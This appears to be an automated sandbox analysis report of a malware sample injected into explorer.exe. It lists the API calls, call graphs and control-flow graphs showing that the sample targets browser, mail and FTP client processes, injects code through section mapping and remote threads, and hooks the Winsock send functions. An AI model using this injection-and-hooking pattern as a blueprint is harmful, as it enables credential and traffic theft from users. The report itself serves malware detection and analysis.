817->809 819 9d1198 lstrcmpi 818->819 818->820 819->820 821 9d11ac lstrcmpi 819->821 820->815 824 9d2608 VirtualQuery 820->824 828 9d12ae lstrcmpi 820->828 936 9d25ad OpenProcess 820->936 942 9d1819 820->942 821->820 822 9d11c0 lstrcmpi 821->822 822->820 823 9d11d4 lstrcmpi 822->823 823->820 825 9d11e8 lstrcmpi 823->825 824->820 825->820 826 9d11fc lstrcmpi 825->826 826->820 827 9d120c lstrcmpi 826->827 827->820 829 9d121c lstrcmpi 827->829 828->820 829->820 830 9d122c lstrcmpi 829->830 830->820 831 9d123c lstrcmpi 830->831 831->820 833 9d124c lstrcmpi 831->833 833->820 834 9d125c lstrcmpi 833->834 834->820 835 9d126c lstrcmpi 834->835 835->815 835->820 836->735 837->777 838->779 840 9d1384 CreateMutexA GetLastError 839->840 841 9d2664 CryptCreateHash lstrlen CryptHashData CryptGetHashParam 839->841 840->782 840->783 842 9d26aa wsprintfA 841->842 842->842 843 9d26cc CryptDestroyHash CryptReleaseContext 842->843 843->840 845 9d2515 844->845 846 9d2565 CloseHandle 845->846 847 9d2555 Thread32Next 845->847 848 9d2521 OpenThread 845->848 846->786 847->845 849 9d253c SuspendThread 848->849 850 9d2544 ResumeThread 848->850 851 9d254a CloseHandle 849->851 850->851 851->847 853 9d1ded 852->853 861 9d1e56 852->861 853->861 894 9d1e93 VirtualProtect 853->894 855 9d1e04 855->861 895 9d2815 VirtualAlloc 855->895 857 9d1e10 858 9d1e2d 857->858 859 9d1e1a RtlMoveMemory 857->859 896 9d1e93 VirtualProtect 858->896 859->858 861->789 863 9d2608 VirtualQuery 862->863 864 9d284b 863->864 865 9d1414 864->865 866 9d284f GetProcessHeap HeapFree 864->866 865->790 866->865 868 9d14a1 867->868 869 9d14c0 867->869 897 9d17c7 868->897 871 9d14c8 869->871 872 9d1510 869->872 874 9d17c7 5 API calls 871->874 891 9d14b6 871->891 916 9d26e6 lstrlen lstrlen 872->916 876 9d14e0 874->876 876->891 904 9d1647 876->904 877 9d155f 878 9d26e6 2 API calls 877->878 881 9d156c 878->881 879 9d1532 918 9d1752 GetModuleHandleA GetProcAddress 879->918 884 9d1584 881->884 885 9d15a0 881->885 881->891 921 9d2404 lstrlen 884->921 887 9d2404 5 API calls 885->887 885->891 890 9d15ac 887->890 888 9d1647 11 API calls 888->891 890->891 892 9d1647 11 API calls 890->892 891->799 893 9d14fb 892->893 893->891 927 9d15e0 893->927 894->855 895->857 896->861 898 9d1812 897->898 899 9d17d1 897->899 898->891 899->898 900 9d26e6 2 API calls 899->900 901 9d17f1 900->901 901->898 932 9d2861 GetProcessHeap RtlAllocateHeap 901->932 903 9d1804 RtlMoveMemory 903->898 905 9d1660 904->905 915 9d1745 904->915 906 9d1671 lstrlen 905->906 905->915 907 9d1683 lstrlen 906->907 906->915 908 9d1690 getpeername 907->908 907->915 909 9d16ae inet_ntoa htons 908->909 908->915 910 9d16cc 909->910 909->915 910->915 933 9d2861 GetProcessHeap RtlAllocateHeap 910->933 912 9d1717 wsprintfA 913 9d173a 912->913 914 9d2843 3 API calls 913->914 913->915 914->915 915->893 917 9d151d 916->917 917->877 917->879 919 9d1776 RtlZeroMemory RtlZeroMemory RtlZeroMemory RtlZeroMemory 918->919 920 9d1539 918->920 919->920 920->888 920->891 922 9d241c CryptStringToBinaryA 921->922 923 9d2456 921->923 922->923 924 9d2438 922->924 923->891 934 9d2861 GetProcessHeap RtlAllocateHeap 924->934 926 9d2444 CryptStringToBinaryA 926->923 928 9d2843 3 API calls 927->928 929 9d15f5 928->929 930 9d2843 3 API calls 929->930 931 9d15fc 930->931 931->891 932->903 933->912 934->926 935->804 937 9d25cb IsWow64Process 936->937 938 9d2600 936->938 939 9d25dc IsWow64Process 937->939 940 9d25ee 937->940 938->820 939->940 941 9d25f9 CloseHandle 939->941 940->941 941->938 943 9d2608 VirtualQuery 942->943 944 9d1833 943->944 945 9d1845 OpenProcess 944->945 947 9d1a76 944->947 946 9d185e 945->946 945->947 948 9d2608 VirtualQuery 946->948 947->820 949 9d1865 948->949 949->947 950 9d188f 949->950 951 9d1873 NtSetInformationProcess 949->951 973 9d1a80 950->973 951->950 954 9d1a80 2 API calls 955 9d18d6 954->955 956 9d1a73 CloseHandle 955->956 957 9d1a80 2 API calls 955->957 956->947 958 9d1900 957->958 979 9d1b17 958->979 961 9d1a80 2 API calls 962 9d1930 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 961->962 963 9d1a4e CreateRemoteThread 962->963 964 9d1985 962->964 966 9d1a65 CloseHandle 963->966 965 9d198b CreateMutexA GetLastError 964->965 969 9d19bb GetModuleHandleA GetProcAddress ReadProcessMemory 964->969 965->964 967 9d19a7 CloseHandle Sleep 965->967 968 9d1a67 CloseHandle CloseHandle 966->968 967->965 968->956 970 9d19ec WriteProcessMemory 969->970 971 9d1a47 969->971 970->971 972 9d1a16 CreateRemoteThread CloseHandle Sleep WriteProcessMemory 970->972 971->966 971->968 972->971 974 9d1a94 973->974 978 9d18b4 973->978 975 9d1aa4 NtCreateSection 974->975 976 9d1ac3 974->976 975->976 977 9d1ad8 NtMapViewOfSection 976->977 976->978 977->978 978->954 980 9d1b2e 979->980 981 9d1b60 979->981 982 9d1b30 RtlMoveMemory 980->982 983 9d1b71 LoadLibraryA 981->983 986 9d1bc3 981->986 987 9d1ba1 GetProcAddress 981->987 982->981 982->982 983->981 985 9d1910 NtUnmapViewOfSection 983->985 984 9d1be1 LdrProcessRelocationBlock 984->985 984->986 985->961 986->984 986->985 987->981 987->985

                            Callgraph

                            • Executed
                            • Not Executed
                            • Opacity -> Relevance
                            • Disassembly available
                            callgraph 0 Function_009D1E5D 21 Function_009D1D80 0->21 1 Function_009D245E 40 Function_009D2861 1->40 2 Function_009D1819 6 Function_009D1B17 2->6 13 Function_009D2608 2->13 19 Function_009D1A80 2->19 3 Function_009D1C19 4 Function_009D24D5 5 Function_009D2815 7 Function_009D3417 8 Function_009D1016 8->2 11 Function_009D2592 8->11 8->13 29 Function_009D2731 8->29 30 Function_009D2573 8->30 31 Function_009D1332 8->31 32 Function_009D25AD 8->32 38 Function_009D10A4 8->38 8->40 9 Function_009D1493 12 Function_009D1752 9->12 15 Function_009D2404 9->15 16 Function_009D1647 9->16 17 Function_009D17C7 9->17 39 Function_009D26E6 9->39 41 Function_009D15E0 9->41 10 Function_009D1E93 14 Function_009D1F4A 14->5 23 Function_009D2843 14->23 26 Function_009D22B8 14->26 27 Function_009D2374 14->27 14->29 37 Function_009D22E5 14->37 14->40 43 Function_009D27E2 14->43 15->40 16->23 33 Function_009D24AE 16->33 16->40 17->39 17->40 18 Function_009D2806 20 Function_009D1DC0 20->3 21->3 22 Function_009D1000 22->8 23->13 24 Function_009D283F 24->13 25 Function_009D263E 26->39 28 Function_009D1EB6 28->14 28->23 28->40 31->4 31->9 31->13 31->23 31->25 31->40 42 Function_009D1DE3 31->42 34 Function_009D1469 34->9 34->13 35 Function_009D7728 36 Function_009D1425 36->9 36->13 37->40 37->43 38->2 38->11 38->13 38->29 38->30 38->32 38->40 41->23 42->0 42->5 42->10 42->20

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 9d1016-9d1020 call 9d2608 3 9d1097-9d1098 0->3 4 9d1022-9d104b call 9d2861 RtlMoveMemory 0->4 7 9d104d-9d106b call 9d2861 RtlMoveMemory 4->7 8 9d1071-9d1090 NtUnmapViewOfSection GetCurrentProcessId 4->8 7->8 10 9d109e-9d10d7 call 9d10a4 call 9d2861 8->10 11 9d1092-9d1093 8->11 21 9d10dc-9d10ea CreateToolhelp32Snapshot 10->21 11->3 13 9d1095-9d1099 call 9d1332 11->13 13->10 22 9d10f0-9d1106 Process32First 21->22 23 9d1322-9d132d Sleep 21->23 24 9d110c-9d111e lstrcmpi 22->24 25 9d131b-9d131c FindCloseChangeNotification 22->25 23->21 26 9d1124-9d1132 lstrcmpi 24->26 27 9d1280-9d1289 call 9d25ad 24->27 25->23 26->27 28 9d1138-9d1146 lstrcmpi 26->28 33 9d128b-9d1294 call 9d2592 27->33 34 9d1305-9d1313 Process32Next 27->34 28->27 30 9d114c-9d115a lstrcmpi 28->30 30->27 32 9d1160-9d116a lstrcmpi 30->32 32->27 35 9d1170-9d117e lstrcmpi 32->35 33->34 41 9d1296-9d129d call 9d2573 33->41 34->24 36 9d1319 34->36 35->27 38 9d1184-9d1192 lstrcmpi 35->38 36->25 38->27 40 9d1198-9d11a6 lstrcmpi 38->40 40->27 42 9d11ac-9d11ba lstrcmpi 40->42 41->34 46 9d129f-9d12ac call 9d2608 41->46 42->27 45 9d11c0-9d11ce lstrcmpi 42->45 45->27 47 9d11d4-9d11e2 lstrcmpi 45->47 46->34 53 9d12ae-9d1300 lstrcmpi call 9d2731 call 9d1819 call 9d2731 46->53 47->27 49 9d11e8-9d11f6 lstrcmpi 47->49 49->27 50 9d11fc-9d120a lstrcmpi 49->50 50->27 52 9d120c-9d121a lstrcmpi 50->52 52->27 54 9d121c-9d122a lstrcmpi 52->54 53->34 54->27 56 9d122c-9d123a lstrcmpi 54->56 56->27 58 9d123c-9d124a lstrcmpi 56->58 58->27 60 9d124c-9d125a lstrcmpi 58->60 60->27 62 9d125c-9d126a lstrcmpi 60->62 62->27 64 9d126c-9d127a lstrcmpi 62->64 64->27 64->34
                            APIs
                              • Part of subcall function 009D2608: VirtualQuery.KERNEL32(009D4434,?,0000001C), ref: 009D2615
                              • Part of subcall function 009D2861: GetProcessHeap.KERNEL32(00000008,0000A000,009D10CC), ref: 009D2864
                              • Part of subcall function 009D2861: RtlAllocateHeap.NTDLL(00000000), ref: 009D286B
                            • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 009D1038
                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 009D106B
                            • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 009D1074
                            • GetCurrentProcessId.KERNEL32(?,009D1010), ref: 009D107A
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009D10DF
                            • Process32First.KERNEL32(00000000,?), ref: 009D10FE
                            • lstrcmpi.KERNEL32(?,firefox.exe), ref: 009D111A
                            • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 009D112E
                            • lstrcmpi.KERNEL32(?,chrome.exe), ref: 009D1142
                            • lstrcmpi.KERNEL32(?,opera.exe), ref: 009D1156
                            • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 009D1166
                            • lstrcmpi.KERNEL32(?,outlook.exe), ref: 009D117A
                            • lstrcmpi.KERNEL32(?,thebat.exe), ref: 009D118E
                            • lstrcmpi.KERNEL32(?,thebat32.exe), ref: 009D11A2
                            • lstrcmpi.KERNEL32(?,thebat64.exe), ref: 009D11B6
                            • lstrcmpi.KERNEL32(?,thunderbird.exe), ref: 009D11CA
                            • lstrcmpi.KERNEL32(?,filezilla.exe), ref: 009D11DE
                            • lstrcmpi.KERNEL32(?,smartftp.exe), ref: 009D11F2
                            • lstrcmpi.KERNEL32(?,winscp.exe), ref: 009D1206
                            • lstrcmpi.KERNEL32(?,flashfxp.exe), ref: 009D1216
                            • lstrcmpi.KERNEL32(?,cuteftppro.exe), ref: 009D1226
                            • lstrcmpi.KERNEL32(?,mailmaster.exe), ref: 009D1236
                            • lstrcmpi.KERNEL32(?,263em.exe), ref: 009D1246
                            • lstrcmpi.KERNEL32(?,foxmail.exe), ref: 009D1256
                            • lstrcmpi.KERNEL32(?,alimail.exe), ref: 009D1266
                            • lstrcmpi.KERNEL32(?,mailchat.exe), ref: 009D1276
                            • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 009D12B4
                            • Process32Next.KERNEL32(00000000,00000128), ref: 009D130B
                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 009D131C
                            • Sleep.KERNELBASE(000003E8), ref: 009D1327
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateChangeCloseCreateCurrentFindFirstNextNotificationQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                            • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                            • API String ID: 831104905-1680033604
                            • Opcode ID: 9f8636360c684a4e30cedb68af07f4dbcf0cf5de5e379ae5c3e3e9729edc5f1e
                            • Instruction ID: 68a043bc8a7c1fe9c47eb22d6574d949c9c2f479f5eb5a9db318e71cb164cf95
                            • Opcode Fuzzy Hash: 9f8636360c684a4e30cedb68af07f4dbcf0cf5de5e379ae5c3e3e9729edc5f1e
                            • Instruction Fuzzy Hash: F571C4326C9305BBCB00EBB0DD45E6E7BACAF85781B44C52BFA50C3290DB31DA458A61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 009D2861: GetProcessHeap.KERNEL32(00000008,0000A000,009D10CC), ref: 009D2864
                              • Part of subcall function 009D2861: RtlAllocateHeap.NTDLL(00000000), ref: 009D286B
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009D10DF
                            • Process32First.KERNEL32(00000000,?), ref: 009D10FE
                            • lstrcmpi.KERNEL32(?,firefox.exe), ref: 009D111A
                            • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 009D112E
                            • lstrcmpi.KERNEL32(?,chrome.exe), ref: 009D1142
                            • lstrcmpi.KERNEL32(?,opera.exe), ref: 009D1156
                            • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 009D1166
                            • lstrcmpi.KERNEL32(?,outlook.exe), ref: 009D117A
                            • lstrcmpi.KERNEL32(?,thebat.exe), ref: 009D118E
                            • lstrcmpi.KERNEL32(?,thebat32.exe), ref: 009D11A2
                            • lstrcmpi.KERNEL32(?,thebat64.exe), ref: 009D11B6
                            • lstrcmpi.KERNEL32(?,thunderbird.exe), ref: 009D11CA
                            • lstrcmpi.KERNEL32(?,filezilla.exe), ref: 009D11DE
                            • lstrcmpi.KERNEL32(?,smartftp.exe), ref: 009D11F2
                            • lstrcmpi.KERNEL32(?,winscp.exe), ref: 009D1206
                            • lstrcmpi.KERNEL32(?,flashfxp.exe), ref: 009D1216
                            • lstrcmpi.KERNEL32(?,cuteftppro.exe), ref: 009D1226
                            • lstrcmpi.KERNEL32(?,mailmaster.exe), ref: 009D1236
                            • lstrcmpi.KERNEL32(?,263em.exe), ref: 009D1246
                            • lstrcmpi.KERNEL32(?,foxmail.exe), ref: 009D1256
                            • lstrcmpi.KERNEL32(?,alimail.exe), ref: 009D1266
                            • lstrcmpi.KERNEL32(?,mailchat.exe), ref: 009D1276
                            • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 009D12B4
                            • Process32Next.KERNEL32(00000000,00000128), ref: 009D130B
                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 009D131C
                            • Sleep.KERNELBASE(000003E8), ref: 009D1327
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcmpi$HeapProcess32$AllocateChangeCloseCreateFindFirstNextNotificationProcessSleepSnapshotToolhelp32
                            • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                            • API String ID: 2875627700-1680033604
                            • Opcode ID: 5ad7e21878a61541973baa7ac3117e3dab092547ba059d87b07399cca64cbf43
                            • Instruction ID: ac656cc791aa656af02ff08ca4b31545d6206553e2aadf26cd72d881b0ca39c8
                            • Opcode Fuzzy Hash: 5ad7e21878a61541973baa7ac3117e3dab092547ba059d87b07399cca64cbf43
                            • Instruction Fuzzy Hash: B851B4326C5305B7CB00DBB18D45E2EBBEC6F85781B44C52BFA50D3290EB21DA058A76
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 112 9d7728-9d7745 113 9d790d 112->113 114 9d774b-9d7758 112->114 113->113 115 9d776a-9d776f 114->115 116 9d7771 115->116 117 9d7760-9d7765 116->117 118 9d7773 116->118 119 9d7766-9d7768 117->119 120 9d7778-9d777a 118->120 119->115 119->116 121 9d777c-9d7781 120->121 122 9d7783-9d7787 120->122 121->122 122->120 123 9d7789 122->123 124 9d778b-9d7792 123->124 125 9d7794-9d7799 123->125 124->120 124->125 126 9d77a8-9d77aa 125->126 127 9d779b-9d77a4 125->127 130 9d77ac-9d77b1 126->130 131 9d77b3-9d77b7 126->131 128 9d781a-9d781d 127->128 129 9d77a6 127->129 132 9d7822-9d7825 128->132 129->126 130->131 133 9d77b9-9d77be 131->133 134 9d77c0-9d77c2 131->134 137 9d7827-9d7829 132->137 133->134 135 9d77e4-9d77f3 134->135 136 9d77c4 134->136 140 9d77f5-9d77fc 135->140 141 9d7804-9d7811 135->141 139 9d77c5-9d77c7 136->139 137->132 138 9d782b-9d782e 137->138 138->132 142 9d7830-9d784c 138->142 143 9d77c9-9d77ce 139->143 144 9d77d0-9d77d4 139->144 140->140 145 9d77fe 140->145 141->141 146 9d7813-9d7815 141->146 142->137 147 9d784e 142->147 143->144 144->139 148 9d77d6 144->148 145->119 146->119 149 9d7854-9d7858 147->149 150 9d77d8-9d77df 148->150 151 9d77e1 148->151 152 9d789f-9d78a2 149->152 153 9d785a-9d7870 LoadLibraryA 149->153 150->139 150->151 151->135 155 9d78a5-9d78ac 152->155 154 9d7871-9d7876 153->154 154->149 156 9d7878-9d787a 154->156 157 9d78ae-9d78b0 155->157 158 9d78d0-9d7900 VirtualProtect * 2 155->158 160 9d787c-9d7882 156->160 161 9d7883-9d7890 GetProcAddress 156->161 162 9d78c3-9d78ce 157->162 163 9d78b2-9d78c1 157->163 159 9d7904-9d7908 158->159 159->159 164 9d790a 159->164 160->161 165 9d7899-9d789c 161->165 166 9d7892-9d7897 161->166 162->163 163->155 164->113 166->154
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507961245.00000000009D6000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D6000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d6000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2f0812814e54d7b09d823457a42c24fd0062391d39e89deffcc6f363dc4bff8b
                            • Instruction ID: 37db1a290c15fde1efa935f5f2349e8d490d595768adf0d865f65ce52dbb0077
                            • Opcode Fuzzy Hash: 2f0812814e54d7b09d823457a42c24fd0062391d39e89deffcc6f363dc4bff8b
                            • Instruction Fuzzy Hash: AF51087198C3924FD7214AF8CCC46A4FBA4DB52320B194A7BC5E5CB3C2F7985805D760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 167 9d2861-9d2871 GetProcessHeap RtlAllocateHeap
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,0000A000,009D10CC), ref: 009D2864
                            • RtlAllocateHeap.NTDLL(00000000), ref: 009D286B
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcess
                            • String ID:
                            • API String ID: 1357844191-0
                            • Opcode ID: a92781d05a288ca752a2145d5170ff4540416c97cd5b91b819ede5d09cfd4e52
                            • Instruction ID: 843eba1c809923c0e759aea9dbafb9e68461a72f6d881f013ef13c43724043f3
                            • Opcode Fuzzy Hash: a92781d05a288ca752a2145d5170ff4540416c97cd5b91b819ede5d09cfd4e52
                            • Instruction Fuzzy Hash: 6BA002715B51407FDD4557A4ED0DF553B19A745703F0085457149D5060996455CC9723
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 009D2608: VirtualQuery.KERNEL32(009D4434,?,0000001C), ref: 009D2615
                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,77296900,microsoftedgecp.exe,?), ref: 009D184E
                            • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 009D1889
                            • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 009D1919
                            • RtlMoveMemory.NTDLL(00000000,009D3428,00000016), ref: 009D1940
                            • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 009D1968
                            • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 009D1978
                            • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009D1992
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 009D199A
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 009D19A8
                            • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 009D19AF
                            • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 009D19C5
                            • GetProcAddress.KERNEL32(00000000), ref: 009D19CC
                            • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 009D19E2
                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 009D1A0C
                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009D1A1F
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 009D1A26
                            • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 009D1A2D
                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 009D1A41
                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 009D1A58
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 009D1A65
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 009D1A6B
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 009D1A71
                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 009D1A74
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                            • String ID: atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                            • API String ID: 1066286714-4141090125
                            • Opcode ID: f25120cae0ef6f21b55f624a47268497a64dc0fc8f696f6c7fc923b84648a45d
                            • Instruction ID: d93bee55abcdb8025069d3fea72699119c567723c592da6a0aa343cd4c49b888
                            • Opcode Fuzzy Hash: f25120cae0ef6f21b55f624a47268497a64dc0fc8f696f6c7fc923b84648a45d
                            • Instruction Fuzzy Hash: D661AE7228A304BFD310DF61DD84E6BBBECEF88755F00852AF94993251D634DE448B62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 009D265A
                            • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 009D2672
                            • lstrlen.KERNEL32(?,00000000), ref: 009D267A
                            • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 009D2685
                            • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 009D269F
                            • wsprintfA.USER32 ref: 009D26B6
                            • CryptDestroyHash.ADVAPI32(?), ref: 009D26CF
                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 009D26D9
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                            • String ID: %02X
                            • API String ID: 3341110664-436463671
                            • Opcode ID: e26226bf92e47920be24930df1f2c5cad7fa7a11144a911e07a41caa797ef62a
                            • Instruction ID: bb9552b7e2416a9bbc4d8040b56e8aa9e4bc06a5e2ef6f3ba8aba3a73d10da70
                            • Opcode Fuzzy Hash: e26226bf92e47920be24930df1f2c5cad7fa7a11144a911e07a41caa797ef62a
                            • Instruction Fuzzy Hash: 91114F7194510CBFDB119BA5ED88EAEBFBCFB44742F108066F605E2150D7718F41AB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 009D2861: GetProcessHeap.KERNEL32(00000008,0000A000,009D10CC), ref: 009D2864
                              • Part of subcall function 009D2861: RtlAllocateHeap.NTDLL(00000000), ref: 009D286B
                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,009D109E,?,009D1010), ref: 009D134A
                            • GetCurrentProcessId.KERNEL32(00000003,?,009D109E,?,009D1010), ref: 009D135B
                            • wsprintfA.USER32 ref: 009D1372
                              • Part of subcall function 009D263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 009D265A
                              • Part of subcall function 009D263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 009D2672
                              • Part of subcall function 009D263E: lstrlen.KERNEL32(?,00000000), ref: 009D267A
                              • Part of subcall function 009D263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 009D2685
                              • Part of subcall function 009D263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 009D269F
                              • Part of subcall function 009D263E: wsprintfA.USER32 ref: 009D26B6
                              • Part of subcall function 009D263E: CryptDestroyHash.ADVAPI32(?), ref: 009D26CF
                              • Part of subcall function 009D263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 009D26D9
                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 009D1389
                            • GetLastError.KERNEL32 ref: 009D138F
                            • Sleep.KERNEL32(000001F4), ref: 009D13A1
                              • Part of subcall function 009D24D5: GetCurrentProcessId.KERNEL32 ref: 009D24E7
                              • Part of subcall function 009D24D5: GetCurrentThreadId.KERNEL32 ref: 009D24EF
                              • Part of subcall function 009D24D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 009D24FF
                              • Part of subcall function 009D24D5: Thread32First.KERNEL32(00000000,0000001C), ref: 009D250D
                              • Part of subcall function 009D24D5: CloseHandle.KERNEL32(00000000), ref: 009D2566
                            • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 009D13B8
                            • GetProcAddress.KERNEL32(00000000), ref: 009D13BF
                            • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 009D13E4
                            • GetProcAddress.KERNEL32(00000000), ref: 009D13EB
                              • Part of subcall function 009D1DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 009D1E1D
                            • RtlExitUserThread.NTDLL(00000000), ref: 009D141D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                            • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                            • API String ID: 706757162-1430290102
                            • Opcode ID: 43786fa54a131a09d4bdbc016155acbe2b6c63a2ea26f420f12472457c551243
                            • Instruction ID: 2b8191c8dd2e41416fd91d9ceebef8570e72fa6251135074718c91fb926ca4fe
                            • Opcode Fuzzy Hash: 43786fa54a131a09d4bdbc016155acbe2b6c63a2ea26f420f12472457c551243
                            • Instruction Fuzzy Hash: 613166317C9214BBCB106FA0DD0AB6E3B59AF95747F00C027FA05973A1CF758A519792
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
